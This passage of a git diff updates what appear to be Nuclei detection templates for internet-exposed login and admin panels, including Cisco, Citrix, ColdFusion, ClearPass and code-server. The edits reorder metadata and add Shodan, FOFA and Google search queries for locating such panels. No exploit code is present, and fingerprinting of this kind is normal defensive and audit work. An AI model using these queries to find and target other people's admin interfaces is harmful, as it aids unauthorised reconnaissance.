a/http/exposed-panels/cisco/cisco-edge-340.yaml b/http/exposed-panels/cisco/cisco-edge-340.yaml index 58777fc4cb..caba7ccc19 100644 --- a/http/exposed-panels/cisco/cisco-edge-340.yaml +++ b/http/exposed-panels/cisco/cisco-edge-340.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:o:cisco:edge_340_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: edge_340_firmware - shodan-query: http.title:"Cisco Edge 340" vendor: cisco + product: edge_340_firmware + shodan-query: + - http.title:"Cisco Edge 340" + - http.title:"cisco edge 340" + fofa-query: title="cisco edge 340" + google-query: intitle:"cisco edge 340" tags: panel,cisco http: @@ -31,4 +35,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207f465775b3c58ee181e59540bb7d65ba1505d8981474eee6903db9853c6e57bc022001a24d30bc1e3114e3daeabd175b058c6b6c741486dad03c2f430a47ce9f9ba4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210091474c0452b33a305c01c0ac300ac54d1b63f8ec5dde3443eb6a71dfe5f2ed260220389e1eddcee9428b13e44ade0c745937fd3bc4fe6b90851f2f99cf9f1db2efcf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-expressway-panel.yaml b/http/exposed-panels/cisco/cisco-expressway-panel.yaml index da05d10e66..922fc28da2 100644 --- a/http/exposed-panels/cisco/cisco-expressway-panel.yaml +++ b/http/exposed-panels/cisco/cisco-expressway-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html metadata: + verified: true max-request: 1 shodan-query: html:"Cisco Expressway" - verified: true tags: panel,cisco,login,detect http: @@ -32,4 +32,4 @@ http: group: 1 regex: - 'Cisco\s+(?:Expressway|Expway)\s+([A-Za-z\s]+)<\/legend>' -# digest: 490a00463044022017cea3c30c4e5c14448f32affcc2a76041719a68ce7b1b73917ca5b7add1b4bd022002fbfafa35171c448235c328299b377ed67c036b2cf72fca115108cf1b88f207:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072ff0d78e16c7789ee82205c94f1efea59dedb5d2deb469c5137640a14dc61f6022100ea4b5e671f90362a0a83b148b1ecafd2abab1fa530cb14295fed23da04d36fc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-finesse-login.yaml b/http/exposed-panels/cisco/cisco-finesse-login.yaml index 6cc147d625..1b14d0c89c 100644 --- a/http/exposed-panels/cisco/cisco-finesse-login.yaml +++ b/http/exposed-panels/cisco/cisco-finesse-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:cisco:finesse:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: finesse vendor: cisco + product: finesse tags: panel,cisco,edb http: @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e4a6a65f6bf1bce38173fefdb2a3b4258678ab84875fb1e341979373373df894022100f3d89de3cbbd86a90200f0e68044d4379fff4fb846b680c1c78e51015123ee5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d27be65e4f1cf54a326dca789038ac71a17041b8dc66de5d5e21afdaac6a2dbc022100d93c74d718f47106c2f4b0a464ce034b77359b96841b2cc161e77c4ca0deb850:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-integrated-login.yaml b/http/exposed-panels/cisco/cisco-integrated-login.yaml index 05e8a275bc..5be7001654 100644 --- a/http/exposed-panels/cisco/cisco-integrated-login.yaml +++ b/http/exposed-panels/cisco/cisco-integrated-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:cisco:integrated_management_controller:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: integrated_management_controller vendor: cisco + product: integrated_management_controller tags: panel,cisco,edb http: @@ -31,4 +31,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202a0dd981470c642b51b1f5ba6b22d72992ed695c05b1aeb9d3d0eac8741a7057022100aaecd798319368dc048b399829ce9a2fb1e8a886fc19f92c3e54f3a9b267bde7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cc44b6dc1e7032221b90370377049823e74cb924e75a34aef60e683948f23ac602205c7a26bd39aba65c5e73df030a83b1e2cdcb18a07ce60977e725a222545e0e00:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml b/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml index 5dbc02e7fb..51e3bf4076 100644 --- a/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml +++ b/http/exposed-panels/cisco/cisco-ios-xe-panel.yaml @@ -13,11 +13,11 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:cisco:ios_xe:*:*:*:*:*:*:*:* metadata: + verified: "true" max-request: 2 + vendor: cisco product: ios_xe shodan-query: http.html_hash:1076109428 - vendor: cisco - verified: "true" tags: panel,cisco,ssl ssl: - address: "{{Host}}:{{Port}}" @@ -38,4 +38,4 @@ http: - type: kval kval: - ssl_issuer_dn -# digest: 4a0a0047304502202fe35c96fb944e3d037046c1f09ff2f3ed415c0d970e45d4d773e6cf4ae54524022100e9932ba706b8ed5327ed31e38d683ece8904f976e2d79612340df07051645348:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fb217f221528624ecd03776b7e9be729d7737d0205c72623af3f429e39aa15d902203e0c6eda2143fcb1e3a8b302b5023ee07366273cb686ae6948ccf79212902ee4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-onprem-panel.yaml b/http/exposed-panels/cisco/cisco-onprem-panel.yaml index 619ff6936c..3ed3fcff07 100644 --- a/http/exposed-panels/cisco/cisco-onprem-panel.yaml +++ b/http/exposed-panels/cisco/cisco-onprem-panel.yaml @@ -12,12 +12,17 @@ info: classification: cpe: cpe:2.3:a:cisco:smart_software_manager_on-prem:*:*:*:*:*:*:*:* metadata: - fofa-query: title="On-Prem License Workspace" - max-request: 2 - product: smart_software_manager_on-prem - shodan-query: title:"On-Prem License Workspace" - vendor: cisco verified: true + max-request: 2 + vendor: cisco + product: smart_software_manager_on-prem + shodan-query: + - title:"On-Prem License Workspace" + - http.title:"on-prem license workspace" + fofa-query: + - title="On-Prem License Workspace" + - title="on-prem license workspace" + google-query: intitle:"on-prem license workspace" tags: cisco,manager,login,panel http: @@ -39,4 +44,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502203057c00283e643fbc48aa34971745f44e59b25748d9898e81ac888515877a1f4022100d22742a5b2b58de31ddd1ab4c6e79570e0c60cc6ba477e0d17d56909855a8708:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202d4ba901be63f05b33707061c535b48fa1af71a1689a73b0342b6b3624d34704022100ed876148dd7d0c1cd2be57d2a8afec6f281df96e32726a681b687e07bbf07423:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml b/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml index 589de4f482..7919fe83f9 100644 --- a/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml +++ b/http/exposed-panels/cisco/cisco-prime-infrastructure.yaml @@ -12,9 +12,11 @@ info: cpe: cpe:2.3:a:cisco:prime_infrastructure:*:*:*:*:*:*:*:* metadata: max-request: 1 + vendor: cisco product: prime_infrastructure shodan-query: http.title:"prime infrastructure" - vendor: cisco + fofa-query: title="prime infrastructure" + google-query: intitle:"prime infrastructure" tags: panel,cisco http: @@ -33,4 +35,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008ad6993b361c47b5b15364e3e13b83869c41cbec921cc69c8aec538725c3f426022026674bf51fe157886e9aef9d9ab665a764b4aacdf4da186f2a69b13b5559916f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f6a290eafacd7ece924153c694eb47b622fe115f218eaede4f64a87ed3fa2638022056dd83e950366945b634b11fd2ba2ebb86aac24f769a47092c57352d7bfb4a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-sd-wan.yaml b/http/exposed-panels/cisco/cisco-sd-wan.yaml index 383fa25abe..38fcfa2c41 100644 --- a/http/exposed-panels/cisco/cisco-sd-wan.yaml +++ b/http/exposed-panels/cisco/cisco-sd-wan.yaml @@ -13,8 +13,9 @@ info: cpe: cpe:2.3:a:cisco:sd-wan:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: sd-wan vendor: cisco + product: sd-wan + shodan-query: cpe:"cpe:2.3:a:cisco:sd-wan" tags: panel,cisco http: @@ -32,4 +33,4 @@ http: words: - "SD-Wan Center" part: body -# digest: 4b0a00483046022100b5598020b62176a072a1888f76b243338668976bde9a71b19cb2bb3e63a88ad00221008244c67860e04c4bdc789a1c3f12d1d974c6faf8c87a4bc78340616bfe48e24d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f5cf709931666e54acf1c8426e6f1f334bb7f86169eb888c8d3503b9146186b1022100fdcc9e4ab734dd9a790717df59328f09ea1b0cfc428806725c2fbb93540a604d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-secure-desktop.yaml b/http/exposed-panels/cisco/cisco-secure-desktop.yaml index 7bb349dd37..3991396191 100644 --- a/http/exposed-panels/cisco/cisco-secure-desktop.yaml +++ b/http/exposed-panels/cisco/cisco-secure-desktop.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:cisco:secure_desktop:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: secure_desktop vendor: cisco + product: secure_desktop tags: cisco,panel http: @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e9b6c25596579db910a93a595f0766705b9fbf7457f9ffcb3c24e4bfceef7aad02200cfe225b78a832a61cc701e78ed4299a38dcb9493be8c7bdfbdf6f861247facc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201f8b0d9b75386e306804b047c31143bfe91e6b2a5f4b9eba9a17df4990020a25022100fed553feded319634b6757b006f2001562fac279050061c87a602b44ede36fbd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-systems-login.yaml b/http/exposed-panels/cisco/cisco-systems-login.yaml index bf615685c0..2776f74004 100644 --- a/http/exposed-panels/cisco/cisco-systems-login.yaml +++ b/http/exposed-panels/cisco/cisco-systems-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - google-query: intitle:"Cisco Systems Login" max-request: 1 shodan-query: http.title:"Cisco Systems Login" + google-query: intitle:"Cisco Systems Login" tags: panel,cisco http: @@ -35,4 +35,4 @@ http: group: 1 regex: - '<script src="javascript\/translate\.js\?ver=(.+)"><\/script>' -# digest: 490a0046304402200a84131d78c01cb6f069c25998265963460c5f86ef8298d4a32cc467e086bc0602203be6758e0453613e613bb6c24db8428c708970fc33a87cc380ad9f19ce80f084:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aec3c07db99ccd690906e67ae3258e50cb18e208b8bb7855ceeb058a3e01cd4102203dcf9e270a179dcec805bf5264dae705b0e335d4006381690a3471e94d875320:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-telepresence.yaml b/http/exposed-panels/cisco/cisco-telepresence.yaml index a15f79e67a..bdcfe23092 100644 --- a/http/exposed-panels/cisco/cisco-telepresence.yaml +++ b/http/exposed-panels/cisco/cisco-telepresence.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Cisco Telepresence" - verified: true tags: panel,cisco http: @@ -32,4 +32,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203ee9c2b2d4e7121beb3f8b6b66cbfde2db5682bd937bdd8276072a3cbb4242eb02207779d5640efa3ccb4e4c39363bdccbb5804324587d839beecbdbdd9fb9f01722:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f649be6fea4bce0d982ef8a1d675dd3ae50dc6fb7b1f4ac345cb87a2f1f31c0602210087028f358bef32720c4466aa8ddaa46b7b828f8de5842aa47edfb47bfcfef145:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml b/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml index fbd57909eb..c575af8ab0 100644 --- a/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml +++ b/http/exposed-panels/cisco/cisco-ucs-kvm-login.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:cisco:unified_computing_system:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: unified_computing_system - shodan-query: http.title:"Cisco UCS KVM Direct" vendor: cisco + product: unified_computing_system + shodan-query: + - http.title:"Cisco UCS KVM Direct" + - http.title:"cisco ucs kvm direct" + fofa-query: title="cisco ucs kvm direct" + google-query: intitle:"cisco ucs kvm direct" tags: panel,cisco,ucs,kvm http: @@ -33,4 +37,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f008dcc95f3f2b4e7a348a8aee91b940f39e08cccc32e6fd16f3e7becb30b7cb022100e8d48ecf6642bfe52c79b6933dbaa15c7abf1376a6c3b8dc82bb198d044b8949:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ac4752934db0f39c64bedf7049da6d348de50071454b6e6aea0edbf5a64b446e022068e5b3c2b1cc5313780414aca249faa85ca913dbf6ad690d1792677bcf735115:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-vmanage-login.yaml b/http/exposed-panels/cisco/cisco-vmanage-login.yaml index 387f20f781..5644f0c5fe 100644 --- a/http/exposed-panels/cisco/cisco-vmanage-login.yaml +++ b/http/exposed-panels/cisco/cisco-vmanage-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Cisco vManage" - verified: true tags: panel,cisco http: @@ -29,4 +29,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207bebb700d01a238c77cb7f736992a528d4e48facc9a5e4b50b2987d06d03634f022067419f032c02b827b89a70d898d09e1a1b7513819ec78caf3d1cf63420a40d46:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022043e23c06eccbbeed91487c48e1c653a79a55aadb9a3449a4def7e50ff02282ff022031d9cf051adb89ef6a2d6571e43ef388130b6562c867f3e9227eb54e84282b76:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-webvpn-detect.yaml b/http/exposed-panels/cisco/cisco-webvpn-detect.yaml index 3c1915c944..60677ce338 100644 --- a/http/exposed-panels/cisco/cisco-webvpn-detect.yaml +++ b/http/exposed-panels/cisco/cisco-webvpn-detect.yaml @@ -11,10 +11,10 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true + max-request: 2 fofa-query: fid="U1TP/SJklrT9VLIEpZkQNg==" google-query: intitle:"SSLVPN Service" - max-request: 2 - verified: true tags: panel,cisco,vpn http: @@ -44,4 +44,4 @@ http: - "webvpncontext=00@.+" - "webvpn=" condition: or -# digest: 4a0a0047304502206522258ba2efd88f6be3f7fb415e8a33a4b57f2b9af95a0bf58190935266954d022100f90e5bf561b6406a06ca4ae661b2df6bac2074717c631ae48fa7bb7356083348:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210088ddeac35157a271b0f1f1595c19a74522fabc615e920ef2cb67b76dff3d392e0221009c980fcc733d03a3128197719aae830f395f20af1b8d6887a05f7ae764bcb0fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/citrix-adc-gateway-detect.yaml b/http/exposed-panels/citrix-adc-gateway-detect.yaml index d531e2a1be..a1df84a7bb 100644 --- a/http/exposed-panels/citrix-adc-gateway-detect.yaml +++ b/http/exposed-panels/citrix-adc-gateway-detect.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: gateway vendor: citrix + product: gateway + shodan-query: http.title:"citrix gateway" + fofa-query: title="citrix gateway" + google-query: intitle:"citrix gateway" tags: panel,citrix http: @@ -25,4 +28,4 @@ http: - type: word words: - '_ctxstxt_CitrixCopyright' -# digest: 490a00463044022063ddb01cf4f07110c8d302799a24ae19298037d92b19763cb5d9b7e7ee85aec102207855ae2252ecb94d8bcea4780631f33e0e8fba98d9d9c253dbe2e0b8fae6552d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100def0df0318116cba761ff082fafa632bb0ac37705b48f62153dd6de1c4606add022022b255fadbaee8f390603a8dbd9773d3a551f359b613e97fbe8df00c482592ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/citrix-vpn-detect.yaml b/http/exposed-panels/citrix-vpn-detect.yaml index 804efdc634..aac8a145f2 100644 --- a/http/exposed-panels/citrix-vpn-detect.yaml +++ b/http/exposed-panels/citrix-vpn-detect.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:citrix:gateway:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: gateway vendor: citrix + product: gateway + shodan-query: http.title:"citrix gateway" + fofa-query: title="citrix gateway" + google-query: intitle:"citrix gateway" tags: panel,citrix http: @@ -24,4 +27,4 @@ http: - type: word words: - "<title>Citrix Gateway" -# digest: 4a0a00473045022100eca24bbc63720dda57f5b0ec3bbcf734ee30db56bba9f4d638d09a4bac869c3002200cc5abe25e0e58146b81e7d1db4ebb95eed4c4e1a6c8191e825ea3f85abaf64f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dbc5159673e9250ec0ff9ba4ce31a621cc7f91655f45a9a74a9eee5efa9837e402202fbe781620e2abee7da2934422efc71094df3279854bdd7820f4cdd0bb457873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/claris-filemaker-webdirect.yaml b/http/exposed-panels/claris-filemaker-webdirect.yaml index 74349c7f7c..65fe5a1f0a 100644 --- a/http/exposed-panels/claris-filemaker-webdirect.yaml +++ b/http/exposed-panels/claris-filemaker-webdirect.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Claris FileMaker WebDirect" - verified: true tags: panel,edb http: @@ -36,4 +36,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f2954936ee37c4e19172a2d1cfba65e0d842e9e580bab2441484157a9f7428a3022100bdd0f9ea3d432468d731cc63ea1e826fdbac9da931772a647d4bb41719ce3f60:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a28f38c6f651c4adf48eaa9de59639b262a8093d93fb8d63f5a88c2436794af6022100a7990af81bd8bb176fb412c3742d39703bc667b4baaf0a13887e67cb4e3e48d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cleanweb-panel.yaml b/http/exposed-panels/cleanweb-panel.yaml index b98d5b4879..f8ac7c5607 100644 --- a/http/exposed-panels/cleanweb-panel.yaml +++ b/http/exposed-panels/cleanweb-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://tentelemed.com/ metadata: + verified: true max-request: 1 shodan-query: http.title:"CleanWeb" - verified: true tags: panel,cleanweb,login,detect http: @@ -35,4 +35,4 @@ http: group: 1 regex: - 'title="version\s+([0-9A-Za-z\s\.\-]+)"' -# digest: 4a0a004730450220114dc4ed47106deae44c47007b055ff64c218f65f26df7914b9da73558149951022100c39da350a354b34ab5b287c90314f92e11d7d5b390fc98801f357ebec87d72b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b6370e1f7f313940f88f943c9a2b2a16ca6ffe94204c6576665c7390b67b7375022067af3c94b1a2c76e9d86f5173eadb48666a15067c35b01b32332ec482cc1c373:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/clearpass-policy-manager.yaml b/http/exposed-panels/clearpass-policy-manager.yaml index bcd204dd5a..12dae627f4 100644 --- a/http/exposed-panels/clearpass-policy-manager.yaml +++ b/http/exposed-panels/clearpass-policy-manager.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:arubanetworks:clearpass_policy_manager:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: clearpass_policy_manager - shodan-query: http.title:"ClearPass Policy Manager" vendor: arubanetworks + product: clearpass_policy_manager + shodan-query: + - http.title:"ClearPass Policy Manager" + - http.title:"clearpass policy manager" + fofa-query: title="clearpass policy manager" + google-query: intitle:"clearpass policy manager" tags: panel,aruba,arubanetworks http: @@ -30,4 +34,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100b0c75b38ad6fa5df9e7c5a6361bcdbdf79035abd02dcc4670391bcdb29153917022100a622863e86c6dfa15d251a7e02eac8d4cff8649e185ea96576678b29796b3549:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022002123f882d035f9248c882d17dd9bcf5e3b95610b1e94cbc695adaf43e245b10022100b67deae395544476190a7c1e2badf54c84d6ad5fc01783ee5ad0f0196ce772ef:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cloudpanel-login.yaml b/http/exposed-panels/cloudpanel-login.yaml index 15eefeca35..a3d2b77ad6 100644 --- a/http/exposed-panels/cloudpanel-login.yaml +++ b/http/exposed-panels/cloudpanel-login.yaml @@ -7,12 +7,18 @@ info: classification: cpe: cpe:2.3:a:mgt-commerce:cloudpanel:*:*:*:*:*:*:*:* metadata: - fofa-query: icon_hash="151132309" - max-request: 1 - product: cloudpanel - shodan-query: http.favicon.hash:151132309 - vendor: mgt-commerce verified: true + max-request: 1 + vendor: mgt-commerce + product: cloudpanel + shodan-query: + - http.favicon.hash:151132309 + - http.title:"cloudpanel" + - http.favicon.hash:"151132309" + fofa-query: + - icon_hash="151132309" + - title="cloudpanel" + google-query: intitle:"cloudpanel" tags: panel,login,cloudpanel,detect,mgt-commerce http: @@ -32,4 +38,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022060a3136030bfe7b24fb4a98d876903444b39b2d033cd9b30500bd27cdef03aa002207613e3015c673150720cc52c61bfc344c7e5a517185b641015625457117cd702:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ac430a81f6d239acf9da9fc2ae7ff9378320ffe313d57e3eda6c162ed7425d6f022100ee3f2ee02acb997e5580b668fbfc9781346bf2681fe872e3ac0ff54f1c3b1f01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cobbler-webgui.yaml b/http/exposed-panels/cobbler-webgui.yaml index 003eb0353d..9cb2b66822 100644 --- a/http/exposed-panels/cobbler-webgui.yaml +++ b/http/exposed-panels/cobbler-webgui.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:cobblerd:cobbler:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: cobbler - shodan-query: http.title:"Cobbler Web Interface" vendor: cobblerd + product: cobbler + shodan-query: + - http.title:"Cobbler Web Interface" + - http.title:"cobbler web interface" + fofa-query: title="cobbler web interface" + google-query: intitle:"cobbler web interface" tags: cobbler,webserver,panel,cobblerd http: @@ -37,4 +41,4 @@ http: - "/cobbler_webui_content/" - "/cobbler_web/do_login" condition: or -# digest: 4a0a0047304502203cd78eb6703e6c7390e11df6d6e0b0c727118ae2489baf37d35da024d8b0275302210093961a9b3d49a30138b10a306d392d10d30ea3be2b76f6e0f53b390e1b94d0b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ea4ce96042cfa7d9841504d0e5d321c872b9ddb1590f6e2a2f671220ef29a95b022100e804961dbfcaea003ac2470b58f7777f2e345c3f403c725a23adca9f237b75d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/code-server-login.yaml b/http/exposed-panels/code-server-login.yaml index ce1f1d0854..f5a1ad8a7a 100644 --- a/http/exposed-panels/code-server-login.yaml +++ b/http/exposed-panels/code-server-login.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:coder:code-server:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: coder product: code-server shodan-query: http.title:"code-server login" - vendor: coder - verified: true + fofa-query: title="code-server login" + google-query: intitle:"code-server login" tags: panel,detect,misc,coder http: @@ -38,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f3d36874f463be42f58a4b29e186f8f55eceaa9361540e3abf10be3b5eb72ea10220335ce5cb2ecf89ba71e2a2a7e27c3bc699d2adb478f03e1539211d023118ee07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c7ec8d06e7912dde206331a183e86af24fe4ebeff8a386a6b8e1e37b4aed819b0220112d114f12f92d909283bb5b7e3b8226c8502f446c42539a28e1b2a47d3b686c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/code42-panel.yaml b/http/exposed-panels/code42-panel.yaml index afaf429022..eae66ee54f 100644 --- a/http/exposed-panels/code42-panel.yaml +++ b/http/exposed-panels/code42-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:code42:code42:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: code42 vendor: code42 + product: code42 tags: panel,code42 http: @@ -29,4 +29,4 @@ http: - type: word words: - "Code42 homepage" -# digest: 490a0046304402203e8b1a2a09bde04f0aa4286d3ff6839ec46cd22b14534f7324821785fc0c15ad02206d7911ddef51d3d2db5dff9d7e15e09fce73602caff4653bd8d9c7ed68154969:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022044fd6e1168b38dd772b3984319888a6d9b42fb4ba13c421e7688e7fadafdadde0220544863e0a3ceff2657d6e73f7bfefc752a76beacebe056cdcf4c91c0c36e9554:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/codemeter-webadmin-panel.yaml b/http/exposed-panels/codemeter-webadmin-panel.yaml index c4dd8324f3..dd7aa6c1d9 100644 --- a/http/exposed-panels/codemeter-webadmin-panel.yaml +++ b/http/exposed-panels/codemeter-webadmin-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:a:wibu:codemeter:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: codemeter vendor: wibu + product: codemeter tags: codemeter,webadmin,panel,wibu http: @@ -31,4 +31,4 @@ http: status: - 301 - 302 -# digest: 4a0a00473045022100c534a8256d713b49b38c60b041ef1ad8551c8c24b20d219db28f0ac44b8f687e022048db3e1b43f2ac27d9f5bea69ffe5e6389fceeead8670c65b89bfd5a9837946a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a4354467f88c28a93131dd9d4acef71229ae68442f540f55a046fdd9dc5743ef022100f915d1f83edbfc505eb8636577ad78ff20d8e7ea8f0bc08ae9c76f0aacc388e1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/coldfusion-administrator-login.yaml b/http/exposed-panels/coldfusion-administrator-login.yaml index 2cdeac80fe..1c916ff2db 100644 --- a/http/exposed-panels/coldfusion-administrator-login.yaml +++ b/http/exposed-panels/coldfusion-administrator-login.yaml @@ -11,9 +11,17 @@ info: cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: coldfusion - shodan-query: http.title:"ColdFusion Administrator Login" vendor: adobe + product: coldfusion + shodan-query: + - http.title:"ColdFusion Administrator Login" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="adobe-coldfusion" + - title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: panel,coldfusion,adobe http: @@ -30,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022071f1807b59a40888c4beed7eee2f23e982330fdf510db2152c8d115977f81074022100d062ed5f0ad8278d3e7809b6347ac4a5072f0b3015e394a21b567483cfdde3d3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e90d4d2afd339ab50370a9a0f3f07c7cfa80b6a388c6227cbe40df2ffcc2145302203461f75bc5f90f436bc602113c2cd524e4b9020b3a8848c31e1bcb432b5d7da3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/compal-panel.yaml b/http/exposed-panels/compal-panel.yaml index 342aa5b8b0..2756dbf201 100644 --- a/http/exposed-panels/compal-panel.yaml +++ b/http/exposed-panels/compal-panel.yaml @@ -11,8 +11,8 @@ info: cpe: 